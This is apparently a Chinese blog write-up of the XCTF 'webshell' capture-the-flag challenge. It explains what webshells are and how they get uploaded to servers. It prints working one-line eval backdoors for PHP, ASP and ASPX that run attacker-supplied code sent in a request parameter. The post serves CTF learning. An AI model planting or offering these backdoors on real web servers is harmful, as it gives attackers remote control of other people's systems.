zoukankan      html  css  js  c++  java
  • webshell xctf

    webshell
    维基百科:

          webshell(分类为远程访问木马)是作为一个基于网络的实现的网络安全威胁shell概念。 Webshell可以上传到Web服务器,以
          允许远程访问Web服务器,例如Web服务器的文件系统。
    Webshell的独特之处在于它使用户能够通过充当命令行界面的Web浏览器访问Web服务器。用户可以使用Web浏览器通过万维网访问远程计算机在任何类型的系统上,无论是台式计算机还是带有Web浏览器的手机,都可以在远程系统上执行任务。主机或客户端都不需要命令行环境。

          简单的说webshell就是web后门,比如php,asp木马后门。黑客在入侵了一个网站后,常常在将这些 asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。然后就可以用web的方式,通过asp或php木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等。

          Web shell通过Web应用程序中的漏洞或弱服务器安全配置上传,包括以下内容:

    SQL注入 ;
    应用程序和服务中的漏洞(例如NGINX等Web服务器软件或WordPress等内容管理系统应用程序);
    文件处理和上传漏洞(例如限制可上传的文件类型);
    远程文件包含(RFI)和本地文件包含(LFI)漏洞;
    远程代码执行 ;
    暴露的管理界面;
    跨站脚本

    php 一句话木马:

    <?php @eval($_POST[value]); ?>

    asp 一句话木马:

    <%eval request ("value")%> 或  
    <% execute(request("value")) %>   

    aspx 一句话木马:

    <%@ Page Language="Jscript" %>
    或
    <% eval(Request.Item["value"]) %>
    

     连上下载看看:



  • 相关阅读:
    window+Apache+php+mysql注意事项
    【转】QRCode二维码的应用心得
    如何创建和配置服务器证书进行SSL Relay
    Citrix 实践中的问题及解决
    web.config中httpRunTime的属性
    [原]IE9 DOM的自定义属性问题
    添加图片到数据库
    Windows server 2008安装企业CA证书服务
    EXTJS Date 的转换格式化字符
    Extjs 4.1 学习笔记(一)(proxy,loader,treestore)
  • 原文地址:https://www.cnblogs.com/jentleTao/p/13229127.html
Copyright © 2011-2022 走看看